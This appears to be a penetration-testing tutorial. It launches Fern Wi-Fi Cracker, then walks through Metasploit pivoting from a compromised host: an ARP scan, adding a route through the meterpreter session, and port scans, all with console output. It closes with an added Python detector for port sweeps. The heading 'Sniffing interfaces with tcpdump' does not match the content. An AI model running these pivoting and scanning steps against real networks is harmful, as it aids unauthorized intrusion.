1. Setting up and running Fern wi-fi cracker

After installing it, open a terminal and run it with admin privileges by entering the command below.
sudo python /usr/local/bin/Fern-Wifi-Cracker/execute.py

2. Sniffing interfaces with tcpdump

Arp_scanner will perform an ARP scan for a given range through a compromised host.
meterpreter > run arp_scanner -r 192.168.15.1/24
[*] ARP Scanning 192.168.15.1/24
[*] IP: 192.168.15.5 MAC d8:d3:85:d3:8:2d
[*] IP: 192.168.15.3 MAC 0:b:db:1d:d3:2b
[*] IP: 192.168.15.1 MAC 0:17:ee:ca:32:b2
meterpreter > run arp_scanner -r 192.168.0.1/24
[*] ARP Scanning 192.168.0.1/24
[*] IP: 192.168.0.1 MAC 0:9:5b:fa:66:f2
[*] IP: 192.168.0.5 MAC 0:16:6f:79:68:0
[*] IP: 192.168.0.9 MAC 0:90:4b:12:34:4c
[*] IP: 192.168.0.7 MAC 0:21:6a:b5:9a:f0
Next we need to add the route to our meterpreter session. We do this with the route add option in the msf console; you will need to background your meterpreter session:
meterpreter > background
msf exploit(handler) > route add 192.168.15.1 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet          Netmask          Gateway
------          -------          -------
192.168.15.1    255.255.255.0    Session 1
Notice the number 1 at the end of the route add command. It identifies the meterpreter session we are adding the route to, and it is very important because it implies the tunnel ID. The tunnel ID must match the route that we are going to add. You can have many different tunnel IDs for one or several different IP addresses, and it is important to keep them straight.
Next we need a port scanner to discover any open ports on the IPs listed by our ARP sweep. To do this, we load the TCP port scanner found in the auxiliary tools and run it on the available IPs from the ARP sweep:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.15.1
RHOSTS => 192.168.15.1
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
This is where we set our RHOSTS to the IP we want to scan and set the PORTS with the range we want to scan (1-1024). Then we type run and the results are listed:
msf auxiliary(tcp) > run
[*] 192.168.15.1:22 - TCP OPEN
[*] 192.168.15.1:80 - TCP OPEN
[*] 192.168.15.1:554 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > set RHOSTS 192.168.15.2
RHOSTS => 192.168.15.2
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
msf auxiliary(tcp) > run
[*] 192.168.15.2:22 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > set RHOSTS 192.168.15.5
RHOSTS => 192.168.15.5
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
msf auxiliary(tcp) > run
[*] 192.168.15.5:80 - TCP OPEN
[*] 192.168.15.5:139 - TCP OPEN
[*] 192.168.15.5:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
CONCURRENCY  10               yes       The number of concurrent ports to check per host
FILTER                        no        The filter string for capturing traffic
INTERFACE                     no        The name of the interface
PCAPFILE                      no        The name of the PCAP capture file to process
PORTS        1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS       192.168.15.5     yes       The target address range or CIDR identifier
SNAPLEN      65535            yes       The number of bytes to capture
THREADS      1                yes       The number of concurrent threads
TIMEOUT      1000             yes       The socket connect timeout in milliseconds
VERBOSE      false            no        Display verbose output
msf auxiliary(tcp) >
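On the defending side, the connect scan of ports 1-1024 shown above appears in connection logs as one internal source touching many distinct ports on a single host, with almost every attempt failing. The following is an added example, not part of the original page or of Metasploit, that flags this pattern; the record format, the thresholds and the source addresses 192.168.15.3 and 192.168.15.9 in the sample are assumptions constructed for illustration.

```python
from collections import defaultdict, deque


def detect_port_sweeps(records, window=60.0, min_ports=100, min_fail_ratio=0.9):
    """Flag (src, dst) pairs where one source tries many distinct ports on one
    host within `window` seconds and almost every attempt fails.

    records: time-sorted tuples (ts_seconds, src_ip, dst_ip, dst_port, established).
    Returns one (src, dst, window_start_ts, distinct_ports) tuple per flagged pair.
    The thresholds are illustrative assumptions, not tuned values.
    """
    recent = defaultdict(deque)  # (src, dst) -> attempts still inside the window
    alerts = {}
    for ts, src, dst, port, established in records:
        key = (src, dst)
        q = recent[key]
        q.append((ts, port, established))
        while ts - q[0][0] > window:  # expire attempts older than the window
            q.popleft()
        if key in alerts:
            continue  # report each pair once
        ports = {p for _, p, _ in q}
        failed = sum(1 for _, _, ok in q if not ok)
        if len(ports) >= min_ports and failed / len(q) >= min_fail_ratio:
            alerts[key] = (src, dst, q[0][0], len(ports))
    return list(alerts.values())


def constructed_sample():
    """Constructed connection records, not real traffic."""
    # Ports reported open on 192.168.15.5 in the scan output on this page.
    open_ports = {80, 139, 445}
    # Hypothetical pivot host sweeping 1-1024 at about ten ports per second.
    scan = [(p / 10.0, "192.168.15.3", "192.168.15.5", p, p in open_ports)
            for p in range(1, 1025)]
    # Hypothetical workstation using the file share normally.
    benign = [(float(t), "192.168.15.9", "192.168.15.5", 445, True)
              for t in range(0, 100, 5)]
    return sorted(scan + benign)


if __name__ == "__main__":
    for src, dst, start, count in detect_port_sweeps(constructed_sample()):
        print(f"possible port sweep {src} -> {dst}: "
              f"{count} distinct ports since t={start}s")
```

The fail-ratio condition is what separates a sweep from a busy but legitimate client, so it should be tuned against the normal traffic of the monitored segment.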
